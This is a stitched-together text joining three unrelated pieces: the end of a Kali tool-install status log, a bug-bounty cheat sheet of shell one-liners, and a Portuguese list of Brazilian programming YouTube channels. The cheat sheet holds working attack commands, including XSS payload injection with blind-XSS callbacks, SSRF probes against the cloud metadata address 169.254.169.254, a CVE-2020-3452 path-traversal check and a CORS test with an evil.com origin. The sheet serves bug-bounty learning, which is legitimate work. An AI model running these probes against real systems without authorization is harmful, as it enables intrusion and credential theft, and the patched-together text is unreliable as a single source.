sipp : FAILURE (not installed)
sipsak : SUCCESS (ok)
skipfish : FAILURE (not installed)
sliver : FAILURE (not installed)
slowhttptest : SUCCESS (ok)
smali : FAILURE (not installed)
smbmap : SUCCESS (ok)
smtp-user-enum : FAILURE (not installed)
snmpcheck : FAILURE (not installed)
snmpenum : FAILURE (not installed)
snowdrop : SUCCESS (ok)
socat : SUCCESS (ok)
spike : FAILURE (not installed)
spooftooph : FAILURE (not installed)
sqldict : FAILURE (not installed)
sqlninja : FAILURE (not installed)
sqlsus : FAILURE (not installed)
ssdeep : SUCCESS (ok)
ssldump : SUCCESS (ok)
sslh : SUCCESS (ok)
sslscan : FAILURE (not installed)
sslsniff : SUCCESS (ok)
sslsplit : SUCCESS (ok)
starkiller : FAILURE (not installed)
steghide : SUCCESS (ok)
stegsnow : SUCCESS (ok)
subfinder : FAILURE (not installed)
subjack : FAILURE (not installed)
sublist3r : FAILURE (not installed)
sucrack : SUCCESS (ok)
swaks : SUCCESS (ok)
t50 : SUCCESS (ok)
tcpick : SUCCESS (ok)
tcpreplay : SUCCESS (ok)
termineter : SUCCESS (ok)
testdisk : SUCCESS (ok)
tftpd32 : FAILURE (not installed)
tnscmd10g : FAILURE (not installed)
truecrack : FAILURE (not installed)
tundeep : FAILURE (not installed)
twofi : FAILURE (not installed)
ubertooth : SUCCESS (ok)
uhd-images : FAILURE (not installed)
undbx : SUCCESS (ok)
unicornscan : FAILURE (not installed)
uniscan : FAILURE (not installed)
unix-privesc-check : FAILURE (not installed)
vboot-utils : SUCCESS (ok)
vinetto : SUCCESS (ok)
vlan : SUCCESS (ok)
voiphopper : FAILURE (not installed)
wafw00f : SUCCESS (ok)
wce : FAILURE (not installed)
webacoo : FAILURE (not installed)
webscarab : FAILURE (not installed)
webshells : FAILURE (not installed)
weevely : SUCCESS (ok)
wfuzz : SUCCESS (ok)
wgetpaste : FAILURE (not installed)
whatweb : SUCCESS (ok)
whois : SUCCESS (ok)
wifiphisher : FAILURE (not installed)
wifite : SUCCESS (ok)
wig : SUCCESS (ok)
wig-ng : FAILURE (not installed)
windows-binaries : FAILURE (not installed)
windows-privesc-check : FAILURE (not installed)
winregfs : SUCCESS (ok)
witnessme : FAILURE (not installed)
wordlistraider : FAILURE (not installed)
wpa-sycophant : FAILURE (not installed)
wpscan : FAILURE (not installed)
xprobe : SUCCESS (ok)
xspy : FAILURE (not installed)
xsser : FAILURE (not installed)
zerofree : SUCCESS (ok)
zonedb : FAILURE (not installed)
zsh-autosuggestions : SUCCESS (ok)
zsh-syntax-highlighting : SUCCESS (ok)
ettercap-graphical : SUCCESS (ok)
Installed 265/587 (45.14%) kali tools on your machine
``` |
# For loops and one liners for bug bounty
Credits goes to all those awesome researchers who uploaded these on Twitter and GitHub
Please Note: Kindly use this only for reference and learning purposes using this doesn't means that you will find Vulnerabilities cause everybody is using this so try to be creative while using it and modify them to get unique results :)
## One Liners for XSS
### Using DALFOX to send the result for xss
```bash
cat target_list| gau | egrep -o "http?.*" | grep "="| egrep -v ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | dalfox pipe -blind https://yours.xss.ht -o result.txt
```
### XSS without GF Patterns
```bash
waybackurls testphp.vulnweb.com| grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
```
### Using Gospider with Dalfox to find XSS
```bash
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o output.txt
```
### Scan subdomains from Bounty Targets data Using DalFox for XSS
```bash
wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; | subfinder -dL domains.txt | httpx -silent -threads 500 | tee -a subdomains.txt | dalfox file subdomains.txt -b your.xss.ht pipe
```
### Using Kxss for finding xss
```bash
cat http://subdomains.txt | waybackurls | kxss
```
### Using Gospider with qsreplace
```bash
gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg/onload=confirm(1);>'
```
************************************************************************************************************************************
## For Finding Subdomains AssetDiscovery
### For making a huge wordlist of subdomains with Rapid 7 FDNS @m4ll0k
Download the zip file from here https://opendata.rapid7.com/sonar.fdns_v2/
```bash
gzip -dc latestfile-fdns_a.json.gz | jq .name | sed 's/"//g' | xargs -I @bash -c 'tldextract @' | awk '{print $1}' >> mysubs.txt
```
### One liner to fetch all URLs in scope of all public programs @_ayoubfathi_
```bash
curl -s https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/hackerone_data.json | jq -r '.[].targets.in_scope[] | select(.asset_type|contains("URL")) | .asset_identifier' |grep -v "*" | sort
```
### Finding Subdomains from crt.sh @vict0ni
```bash
curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
```
### From Bounty Targets Data @dwisiswant0
For Hackerone
```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
```
For Bugcrowd
```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
```
For Intigriti
```bash
curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'
```
### For Finding ASN's of a ORG using amass @KingOFBugBounty
```bash
amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500''
```
### While Loop For Subfinder To Discovery new Subdoamins it will run Every 2 hours
```bash
while true; do subfinder -dL domains.txt -all | anew subdomains1.txt | httpx | notify ; sleep 7200; done
```
Note: Before running the above command make sure you do the below first:
Run `subfinder -dL domains.txt -all >> subdomains1.txt`
Install nuclei, subfinder, Notify and anew
### Brute Force List of subdomains using FFuf
```bash
for url in ` cat $filename `; do ffuf -c -w path.txt -u $url/FUZZ -o result.json ; done >> result.txt
```
### For finding Hidden Servers and Admin Panles @rez0
```bash
ffuf -c -u https://target .com -H "Host: FUZZ" -w vhost_wordlist.txt
```
## One liners for SSRF
### Using waybackurls and gau @R0X4R
After finding subdomains with HTTPX run the Following
```bash
cat subdomains.txt | gauplus --random-agent -b png,jpg,svg,gif -t 100 | anew -q gau_output.txt
cat subdomains.txt | xargs -P 30 -I host bash -c "echo host | waybackurls | anew -q wayback_output.txt"
cat wayback_output.txt gau_output.txt | urldedupe -s | anew -q parameters.txt
Mannual
cat parameters.txt | qsreplace "http://169.254.169.254/latest/meta-data/hostname" | xargs -I host -P 50 bash -c "curl -ks 'host' | grep \"compute.internal\" && echo -e \"[VULNERABLE] - X \n \"" | grep "VULN"
Using OOB
cat parameters.txt | gf ssrf | anew -q ssrf.txt
cat ssrf.txt | qsreplace "interactsh server ID" | anew -q ssrf_test.txt
ffuf -w ssrf_test.txt -u FUZZ -p "0.6-1.2" -H "(header in thread)" -t 200 -s
```
### Using nuclei and Gf for microstrategy SSRF @Virdoex_hunter
```bash
subfdiner -dL domains.txt | httpx | gau | gf ssrf | nuclei -t ~/nuclei-templates/vulnerabilities/other/microstrategy-ssrf.yaml -o result.txt
```
## One Liners for Recon and Visual inspection
### Using Assetfinder with gowitness
```bash
assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
```
### Find Subdomains using Subfinder and opens them on Firefox @payloadartists
```bash
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
```
## One Liners for information disclosure
### Using WaybackURL to find Excel File leads to PII Disclosure @M0_SADAT
```bash
gau http://hacked-site.com | waybackurls | grep ".xlsx"
```
## One Liners for CVE and and other Vulnerabilties
### To find CVE 2020-3452
```bash
while read domains.txt; do curl -s -k "https://$domains/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < domain_list.txt
```
### CORS Missconfiguration @ManasH4rsh
```bash
site="https://example.com"; gau "$site" | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
```
|
![Build Status](https://github.com/lucasgomide/videos-pt.br-tecnologia/workflows/Github%20CI/badge.svg)
[![Awesome](https://awesome.re/badge.svg)](https://awesome.re)
# Canais Brasileiros para Pessoas Desenvolvedoras
<img align="right" srcset="https://user-images.githubusercontent.com/5209129/109561498-01f1db80-7abc-11eb-96ad-ce314dfc76c9.gif, https://user-images.githubusercontent.com/5209129/109561498-01f1db80-7abc-11eb-96ad-ce314dfc76c9.gif 1.5x, https://user-images.githubusercontent.com/5209129/109561498-01f1db80-7abc-11eb-96ad-ce314dfc76c9.gif 2x" src="https://user-images.githubusercontent.com/5209129/109561498-01f1db80-7abc-11eb-96ad-ce314dfc76c9.gif" width="150px;" />
Este projeto foi idealizado e criado pela [Carol](https://github.com/carolsoaressantos)
Repositório responsável em listar Canais no Youtube ou Streaming sobre Tecnologia, Desenvolvimento e Programação em Português.
Esse projeto foi baseado no projeto **[Awesome](https://awesome.re)**
Agradecimentos especiais para [Glaucia](https://github.com/glaucia86) e [Lucas](https://github.com/lucasgomide) que se propuseram em ajudar com ótimas ideias e modificações :heart:
## Contribuições 📌
Pedimos, por favor, que dêem uma olhada nas **[Diretrizes de Contribuição](https://github.com/lucasgomide/videos-pt.br-tecnologia/blob/master/CONTRIBUTING.md)** antes. E desde já, agradecemos a todos os contribuidores. Vocês são demais! ❤️❤️
Para propor melhorias nessa lista, basta abrir uma **[issue](https://github.com/lucasgomide/videos-pt.br-tecnologia/issues)** nesse repositório. Assim, todos poderão colaborar para o melhor desenvolvimento desse repositório. E sintam-se à vontade em fazer Pull Requests!!
## Conteúdos 🔥
Procuramos ordenar os conteúdos e criar uma navegação amigável, visando facilitar a busca por conteúdos e temas. Bastam clicar em algum conteúdo que te interesse, e vòilá!
- [Canais Brasileiros para Pessoas Desenvolvedoras](#canais-brasileiros-para-pessoas-desenvolvedoras)
- [Banco de Dados & Bancos Não Relacionais 💾](#banco-de-dados--bancos-n%C3%A3o-relacionais-)
- [Desenvolvimento Back-End 💻](#desenvolvimento-back-end-)
- [Desenvolvimento Front-End 💻](#desenvolvimento-front-end-)
- [Desenvolvimento Mobile Nativo & Híbrido 📱](#desenvolvimento-mobile-nativo--h%C3%ADbrido-)
- [Entrevista, Webinars & Dicas 📣](#entrevista-webinars--dicas-)
- [Infraestrutura 🖧 ](#infraestrutura-)
- [Inteligência Artificial 🤖](#intelig%C3%AAncia-artificial-)
- [Games :video_game:](#games-video_game)
- [Linux :penguin:](#linux-penguin)
- [Lógica de Programacao](#l%C3%B3gica-de-programacao)
- [Segurança 🔐](#seguran%C3%A7a-)
### Banco de Dados & Bancos Não Relacionais 💾
- [CaquiCoders](https://www.youtube.com/caquicoders) - Canal da comunidade Caqui Coders, sempre rolam lives de assuntos variados relacionados à tecnologia, tudo completamente gratuito. _Tags: `entrevistas`, `nodejs`, `testes`, `sql`, `azure`, `docker`_
- [Nataniel Paiva Oficial](https://www.youtube.com/channel/UCjit8ssBmA7pWISOEqFtbAw) - Canal focado em MongoDb. _Tags: `mongodb`_
- [Sthefane Soares - Vida Programação](https://www.youtube.com/channel/UCcgvGfLMZ8Xh8lxhFPMqjLw) - Canal que trata de programação e opinião própria sobre softwares. Para apaixonados por Tecnologia da Informação. _Tags: `java`,`android`, `ionic`, `c#`, `sql`_
### Desenvolvimento Back-End 💻
- [Andre Baltieri](https://www.youtube.com/user/andrebaltieri) - Aqui você vai encontrar conteúdo sobre desenvolvimento de aplicações Web na plataforma .NET e muito JavaScript. _Tags: `.net`, `javascript`_
- [Balta.io](https://www.youtube.com/channel/UCgnACLvM9O5lfm9ZBh_d3cg) - Canal com foco em desenvolvimento WEB. _Tags: `nodejs`, `entrevistas`, `carreira em ti`, `.net`, `c#`, `angular`_
- [Canal dotNET](https://www.youtube.com/channel/UCIahKJr2Q50Sprk5ztPGnVg/playlists) - Canal para desenvolvedores que desejam aprender a desenvolver software com o .NET Framework. _Tags: `entrevistas`, `azure`, `testes`, `.net`_
- [Celke](https://www.youtube.com/channel/UC5ClMRHFl8o_MAaO4w7ZYug) - Canal pertencente a [Celke](https://celke.com.br/) que aborda as linguagens de programação Back-End PHP e NodeJS. _Tags: `php`,`nodejs`,`bootstrap`,`cakephp`_
- [Code Experts Learning](https://www.youtube.com/channel/UCaXHZLldk54oEwDDAxY_i4A) - Canal pertencente a [Code Experts Learning](https://codeexpertslearning.com.br/), escola online de programação na prática, com foco em desenvolvimento web e mobile, mostrando as principais tendências do mercado de desenvolvimento. _Tags: `php`,`nodejs`,`ionic`,`laravel`,`symfony`_
- [CodeShow](https://www.youtube.com/channel/UCMre98RDRijOX_fvG1gnsYg) - Python e Rust com Bruno Rocha. _Tags: `python`, `rust`, `flask`, `web`_
- [Código Logo](https://www.youtube.com/channel/UCwZFL945LUQcF9OpEWSfbeg) - Canal com foco em desenvolvimento utilizando diversas linguagens de programação, ministrado por Pedro Lima. Aborda a metodologia de tutoriais. Disponilibiliza conteúdos exelentes sobre Inteligência Artificial, Keras, TensorFlow e outras. _Tags: `.net`, `c#`,`c`, `c++`, `python`, `Keras`, `TensorFlow`, `inteligência artificial`_
- [Coding Night](https://www.youtube.com/channel/UCLoVnmvp0fYn-BCK7yKTxUQ) - Canal para compartilhar conhecimento em diversas tecnologias para desenvolvimento de software, principalmente na plataforma Microsoft. _Tags: `.net`, `c#`, `DevOps`, `entrevistas`_
- [Como Programar Melhor](https://www.youtube.com/channel/UCwUtX5abMMaL8KkryVJx09w) - Canal do Raniere Silva com dicas e reflexões sobre desenvolvimento, além de cursos de C#. _Tags: `c#`, `.net`, `entrevista`, `carreira em ti`_
- [Curso Em Video](https://www.youtube.com/user/cursosemvideo) - No canal do Curso em video são encontrados diversos cursos na àrea de tecnologia, sendo alguns deles com foco em programação e desenvolvimento web. _Tags: `python`, `javascript`, `html`, `java`, `sql`, `php`_
- [Danilo Aparecido](https://www.youtube.com/user/Didox59) - Torne-se um programador - Canal com professor graduado, que fala sobre muitas linguagens, um conhecimento e um domínio muito grande em ambas, linguagens tanto de baixo nível quanto de níveis mais altos, aborda não só conteúdos técnicos mas também posicimentos relevantes para a área. _Tags: `ruby`, `javascript`, `nodejs`_
- [De aluno para aluno](https://www.youtube.com/user/italogross) - Canal do Italo com vários vídeos de programação em C e JAVA. Bem completo e com ótima didática. _Tags: `c`, `c#`, `java`_
- [Dev Aprender](https://www.youtube.com/devaprender) - Focado em ensinar iniciantes a programar e montar seu portfólio do ponto de vista de quem já foi iniciante. _Tags: - `python`, `javascript`, `sql`, `automação` e `interface gráfica`, `portfólio`_
- [DevMasterTeam - Code & Learning](https://www.youtube.com/channel/UCkDJEKQpbxY9LFUwfEKNRbQ) - Canal com foco em videos curtos sem enrolação, com cursos de alta qualidade e atualizados. _Tags: `java`, `android`, `kotlin`, `git`_
- [DevSoutinho](https://www.youtube.com/channel/UCzR2u5RWXWjUh7CwLSvbitA) - Vídeos novos sobre o mundo da programação com jogos, desafios de Front End e várias outras coisas toda quinta feira as 11h \o/. _Tags: `javascript`, `jogos`, `css`, `react`_
- [Django MOC](https://www.youtube.com/channel/UCexpfXtye8oLjTSW-wKipcw) - Canal com foco em desenvolvimento WEB voltado para: Python com Django. _Tags: `python`, `django`_
- [edinei.dev](https://www.youtube.com/channel/UCkSe6llMT88LqEGrMROSUbA) - Você vai encontrar nesse canal C#, .NET, JavaScript, TypeScript e Python com Edinei Cavalcanti. _Tags: `.net`, `c#`, `python`, `nodejs`, `web`_
- [Eduardo Mendes - Live de Python](https://www.youtube.com/user/mendesesduardo/featured) - Canal focado em Lives sobre o mundo de Python. _Tags: `python`, `carreira em ti`_
- [Eduardo Pires](https://www.youtube.com/user/headfox) - Melhor canal para quem realmente quer aprender sobre padrões de desenvolvimento: SOLID, DDD, TDD tudo em C# & .NET. _Tags: `asp.net`, `c#`, `ddd`, `tdd`, `design patterns`_
- [Engenharia Reversa](https://www.youtube.com/engenhariareversa) - Canal com vídeos didáticos e profundos sobre assuntos complexos da ciência da computação. _Tags: `ciência da computação`, `seguranca da informação`, `segurança e hacking`_
- [EuProgramador](https://www.youtube.com/channel/UC7c2c7E1L9xhCinShl8-iZA) - O canal aborda assuntos relacionados à vida de um programador. Temas como front-end backend são discultidos em bate papos. Têm também aulas, dicas e tutoriais sobre Golang, PHP e React. _Tags: `golang`, `php`, `react`_
- [eXcript](https://www.youtube.com/channel/UCRu4BNG9k_BRUu-aCYJsgHg) - Canal com foco em tutoriais sobre diferentes linguagens de programação, ministrado pelo professor Cláudio R. Carvalho, com foco em iniciantes e uma didática rápida e de fácil entendimento, este canal merece sua visita. _Tags: `java`, `php`, `c#`,`c`, `c++`, `python`_
- [Filho da nuvem](https://www.youtube.com/filhodanuvem) - Um canal para ajudar semanalmente pessoas a dar o próximo passo na programação. Como criar projetos no GitHub, estudos sobre a linguagem Go e carreira em Portugal são alguns dos temas. _Tags `carreira em ti`, `golang`_
- [Filipe Morelli](https://www.youtube.com/channel/UCh1mfPKMBS0wZz_E5RRFQ_A) - Canal focado em Desenvolvimento WEB. _Tags: `cakephp`, `php`, `less`, `linguagem R`, `typescript`_
- [G- Tech](https://www.youtube.com/channel/UCAf9hyf52WQe1oTRhrtpCBw) - Cursos de programação, desenvolvimento de sistemas e sites e consultoria em TI. _Tags: `java`, `c`, `c++`, `php`_
- [Glaucia Lemos](https://www.youtube.com/channel/UC2Qzw5aqCBk_z0lWJnumWQQ) - Canal para desenvolvedores que desejam aprender a desenvolver software com: Node.js, JavaScript, Angular, TDD, Padrões de Desenvolvimento, ChatBots, Inteligência Artificial e .NET Framework. _Tags: `javascript`, `nodejs`, `angularjs`, `.net`, `chatbots`, `inteligência artificial`, `entrevistas`_
- [Glider](https://www.youtube.com/channel/UCBFCipnenbWX-EhWn05r6aA) - Nosso canal no youtube foca na ideologia que o Glider representa para ensinar para você tudo que a gente acha curioso e inteligente na área de tecnologia. _Tags: `Lua`, `regex`_
- [Guia do Programador](https://www.youtube.com/channel/UC_issB-37g9lwfAA37fy2Tg) - Canal focado em desenvolvimento web e programação, com cursos de Python, Django, Node.Js, Git, dentre outros. _Tags: `python`, `django`, `sql`, `nodejs`, `php`, `git`_
- [Ignorância Zero](https://www.youtube.com/channel/UCmjj41YfcaCpZIkU-oqVIIw) - Canal focado em Python, com um método simples e direto. _Tags: `python`, `django`, `carreira em ti`_
- [João Ribeiro](https://www.youtube.com/user/JLDRPT) - Canal focado em Desenvolvimento WEB. _Tags: `javascript`, `html`, `css`, `sass`, `typescript`, `ajax`, `sql`, `.net`, `c#`, `bootstrap`, `java`, `jquery`_
- [Linguagem C Programação Descomplicada](https://www.youtube.com/user/progdescomplicada) - Ensino em Linguagem C que aborda desde conceitos básicos de algoritmos até conceitos avançados de estrutura de dados, como teoria dos grafos e complexidade. Ministrado pelo Dr. André Backes, professor adjunto da Universidade Federal de Uberlândia e revisor de periódico da IEEE Transactions on Image Processing. Também conta com uma série de vídeo aulas sobre matlab. _Tags:`c`, `matlab`_
- [Lucas Caton](https://www.youtube.com/user/lucascaton) - Lives e vídeos sobre programação, com "mão na massa", direto ao ponto e sem enrolação. _Tags: `ruby`, `rails`, `react`, `criação de APIs`, `expressões regulares`, `css`, `jekyll`, `rspec`_
- [Macoratti](https://www.youtube.com/channel/UCoqYHkQy8q5nEMv1gkcZgSw) - Um dos canais mais conhecidos por todos os brasileiros. Macoratti possui inúmeros tutoriais, desde do Front-End desde ao Back-End, abordando assim, inúmeros tópicos. _Tags: `asp.net`, `asp.net core`, `react native`, `angularjs`, `xamarin`, `visual basic`, `c#`, `sql`_
- [Marcos Azevedo](https://www.youtube.com/channel/UC9l968_q3tSQIRROvJPesow/) - O canal e focado em compartilhar conhecimento para que todos possam aprender tudo sobre programação JAVA. _Tags: `java`, `spring-boot`, `linux`_
- [Michelli Brito](https://www.youtube.com/channel/UC2WbG8UgpPaLcFSNJYwtPow) - Este canal apresenta um conteúdo relacionado a programação web, utilizando principalmente a linguagem Java e o Spring Framework. _Tags:`java`_
- [NodeBR](https://www.youtube.com/channel/UCd4Cp-rzdSAze6C-FOFQ3aw/videos) - Canal que disponibiliza vários webinars sobre desenvolvimento com Node.js. _Tags: `javascript`,`nodejs`_
- [One Bit Code](https://www.youtube.com/channel/UC44Mzz2-5TpyfklUCQ5NuxQ) - O One Bit Code nasceu como um blog dedicado ao mundo da programação, em especial *Ruby on Rails*. No canal é disponibilizado posts, tutoriais, screencasts e dicas sobre temas que envolvem linhas de códigos. _Tags:`ruby on rails`, `carreira em ti`, `entrevista`_
- [Otávio Miranda](https://www.youtube.com/channel/UCORZcu08VQiRCKpVGHTWwAA) - O canal do Otávio Miranda fala de diversas tecnologias como php, python, linux, wordpress. _Tags:`linux`, `php`, `python`_
- [Pedro A Pacheco](https://www.youtube.com/user/pedropachecoa/videos?view_as=subscriber) - Canal do *Dev* Pedro Alexandre Pacheco, Canal com conteúdo original sobre tecnologia, com dicas de web scraping, nodejs, javascript, automação de processos e etc.... Sempre preocupado em utilizar a tecnologia na PRÁTICA. _Tags: `web scraping`,`nodejs`, `automação`,`javascript`_
- [Portal Programando](https://www.youtube.com/PortalProgramando) - O objetivo do canal é apresentar conceitos de algoritmos, programação e dicas da área de tecnologia. É apresentado também cursos completos e cursos práticos de pequena duração. O conteúdo do canal está disponível como podcast de mesmo nome. _Tags: `algoritimos`_
- [Programe seu futuro](https://www.youtube.com/channel/UC9XRXKkGgCXQ2oDbjI7JEBg) - Canal focado em vídeo aulas sobre a linguagem C e Estrutura da dados que aborda conceitos iniciais até o avançado. _Tags: `C`, `Estrutura de dados`_
- [Python Café](https://www.youtube.com/channel/UC70mr11REaCqgKke7DPJoLg/) - Canal do Hallison Paz focado em desenvolvimento com Python, incluindo playlists de estruturas de dados e programação orientada a objetos com a linguagem. _Tags:`python`_
- [Python para Zumbis](https://www.youtube.com/channel/UCripRddD4BnaMcU833ExuwA/) - Programação para iniciantes com Python. _Tags:`python`_
- [Rodrigo Manguinho](https://www.youtube.com/channel/UCabelTt5YHot17aKb19VRNA) - Neste canal, o Mango ensina técnicas avançadas de arquitetura de software e design patterns. _Tags: `TDD`, `Clean Architecture `, `javascript`, `typescript`, `nodejs`, `git`_
- [TDevRocks](https://www.youtube.com/channel/UCKmWWUSI6m51A8a-bZ0dQNw) - Programação Delphi Desktop, Web e Mobile para todos os níveis, incluindo dicas, cursos grátis, Clean Code e RestFULL. _Tags:`Delphi`, `Mobile`, `RestFULL`, `DataSnap`_
- [Techiesse](https://www.youtube.com/channel/UCTjD7yoMG-pNFqy50FE0u5A/featured) - Aulas, tutoriais e vídeos sobre tecnologia, engenharia, telecomunicações e programação. Aulas de MATLAB, Scilab ou programação. _Tags: `lua`, `matlab`_
- [Thulio Bittencourt](https://www.youtube.com/channel/UCs19XXHJtVgqBahCEAQEiIg) - Canal focado em Delphi, MongoDB, FirebirdSQL, ORM e JavaScript. Apresenta algumas séries com dicas e cursos. _Tags:`Delphi`,`MeteorJS`, `MongoDB`, `FirebirdSQL`, `RAD - Rapid Application Development`_
- [Tiago Matos](https://www.youtube.com/user/tiagomatosweb) - Canal focado em vídeo aulas sobre Vue.js._Tags: `laravel`, `javascript`, `css`, `sass`, `vuejs`_
- [Upinside](https://www.youtube.com/user/UpInsideBr) - Canal focado em desenvolvimento backend com PHP moderno e Laravel, além de podcasts com dicas sobre programação e carreira. _Tags: `php`, `laravel`, `carreira`_
- [Waldemar Neto](https://www.youtube.com/user/waldemaneto/featured) - Canal do *Software Engineer* Waldemar Neto, contendo muita informação sobre diversas tecnologias atuais como Docker, Elasticsearch, Node.Js e muito mais. _Tags: `javascript`,`nodejs`, `php`_
### Desenvolvimento Front-End 💻
- [201 Front-End](https://www.youtube.com/channel/UCZXLQtYuKWpPq2Oaf5zpzhg) - Canal com conteúdos relacionados ao desenvolvimento Front-End. Interfaces amigáveis, programação de animações, estética de interfaces, plugins e bibliotecas, dentre outros assuntos. _Tags: `front-end`,`html`,`css`,`ui design`,`web design`_
- [Algaworks](https://www.youtube.com/user/algaworks/playlists?view=1&flow=grid) - Canal da empresa de cursos online Algaworks, onde disponibilizam variados vídeos desde material de apoio sobre diversas tecnologias da atualidade até dicas para quem atua ou pretende atuar na área de desenvolvimento. _Tags: `html5`, `css`, `angularjs`, `angular`, `angular material`_
- [Canal SW9 - FullStack](https://www.youtube.com/+sw9brl) - O Canal SW9 é mantido por Paulo Eduardo de Camargo. Engenheiro da Computação com mais de 15 anos de experiência em desenvolvimento web. A proposta do canal é apoiar a comunidade de desenvolvedores web e híbrido mobile compartilhando dicas, tutorias e aulas relacionadas com linguagens Back e Front, Análise de Ferramentas/Serviços Web, API, SEO e Trilhas de Conhecimento. Todos os códigos fontes estão disponíveis de graça em http://blog.sw9.com.br/acesso-area-de-downloads . _Tags: `Javascript`, `BootStrap UI`, `HTML5`,`CSS3`, `AngularJS`, `Angular 2+`, `NodeJS`, `PHP`, `API`, `TDD`, `Firebase`, `Gulp`_
- [Claudiney Junior](https://www.youtube.com/ClaudineyJunior) - Canal focado principalmente em tecnologia e programação, com ênfase em Javascript, Node.js e ferramentas DevOps, mas de vez em quando também rolam uns conteúdos de diversidades, como jogos e dicas pra relaxar e se divertir. _Tags: `nodejs`, `javascript`, `devopss`_
- [CodarMe](https://www.youtube.com/channel/UCfWLQ9de5j_zsGVjh-tW_6Q) - Canal focado na stack JavaScript, com ênfase em React, NodeJS e Docker. _Tags: `javascript`, `nodejs`, `docker`, `react`_
- [Code Hill College](https://www.youtube.com/channel/UCm63tB8wsKOVvxoU4iMpS2A) - Canal com aulas rápidas e de fácil compreensão com tutoriais de JavaScript e de Angular para iniciantes. _Tags: `javascript`, `angular`_
- [Código de Estagiário](https://www.youtube.com/channel/UCsaZv7dlu8737N0e44kX66w) - Canal com projetos práticos sobre javascript, react, vue e outras tecnologias do ecossistema do javascript. _Tags: `javascript`, `react`, `vue`._
- [CollabCode](https://www.youtube.com/channel/UCVheRLgrk7bOAByaQ0IVolg/playlists) - No canal do Marco tem cursos online incríveis, conteúdo técnico de qualidade e sem contar que o cara tem uma didática absurda. _Tags: `javascript`, `react`, `front-end`, `entrevistas`, `carreira em ti`_
- [Curso Quasar Framework - Patrick Monteiro](https://www.youtube.com/playlist?list=PLBjvYfV_TvwJlOctQ49KiOrxrFwJGqAdr) - Canal do Patrick Monteiro focado atualmente em um curso de Quasar Framework. O que motivou a produção deste curso, foi a falta de conteúdo atualizado em português na internet. _Tags: `quasar framework`, `javascript`_
- [Danki Code](https://www.youtube.com/channel/UCdbMvobipjxi6gdr3L1PBrQ) - Vídeos sobre Programação, Marketing digital e Empreendedorismo. _Tags: `html`, `carreira em ti`_
- [Descompila](https://www.youtube.com/user/CanalSamuelson) - Dicas, sacadas e tutoriais para você tornar-se um profissional completo ou um devPleno. _Tags: `javascript`, `react`, `react native`, `carreira em ti`_
- [DevDojo](https://www.youtube.com/channel/UCjF0OccBT05WxsJb2zNkL4g) - O DevDojo é um canal de cursos gratuitos de desenvolvimento, como Java e TypeScript. _Tags: `java`, `typescript`_
- [DeveloperDeck101](https://www.youtube.com/channel/UCj75B_51OXb9qH15wiHs-Hw) - O DeveloperDeck101 é um canal que ensina novas tecnologias passo a passo e sem complicação._Tags: `javascript`, `react`, `react-native`, `bootstrap`, `flexbox`, `docker`, `aws`_
- [DevPleno](https://www.youtube.com/channel/UC07JWf9A0B1scApbS1Te7Ww/featured) - Dicas, sacadas e tutoriais para você tornar-se um profissional completo ou um devPleno. _Tags: `javascript`, `react`, `react native`, `carreira em ti`_
- [Emerson Broga](https://www.youtube.com/channel/UC29n3f6JhwqtD-kCJi_BwoA) - Aprenda Javascript, NodeJs, React e muito mais! Dicas e tutoriais sobre programação para você se tornar um profissional mais qualificado. _Tags: `javascript`, `nodejs`, `react`, `html`, `css`_
- [Escola Front-End](https://www.youtube.com/c/EscolaFrontend) - Canal que disponibiliza conteúdo referente a aprendizagem do mundo Front-End, Desde Simples Sites em HTML,CSS e JS até Frameworks JS. _Tags: `javascript`, `html`, `css`_
- [Fabio Vedovelli](https://www.youtube.com/user/vedovelli) - O canal tem o foco principal desenvolvimento de Front-End. _Tags: `vuejs`, `react`, `angular`, `laravel`_
- [Fellyph Cintra](https://www.youtube.com/channel/UCPaufJocHYVHj44iwXG95PA) - Conteúdo sobre Desenvolvimento web, JavaScript, PWA, AMP e WordPress. _Tags: `JavaScript`, `PWA`, `AMP`, `WordPress`_
- [Guilherme Chinaglia](https://www.youtube.com/channel/UCEkMd3Bw_bVUuGbXU0sFPSg) - Vídeos sobre Programação, Tecnologia e Empreendedorismo. _Tags: `html5`, `css3`, `javascript`_
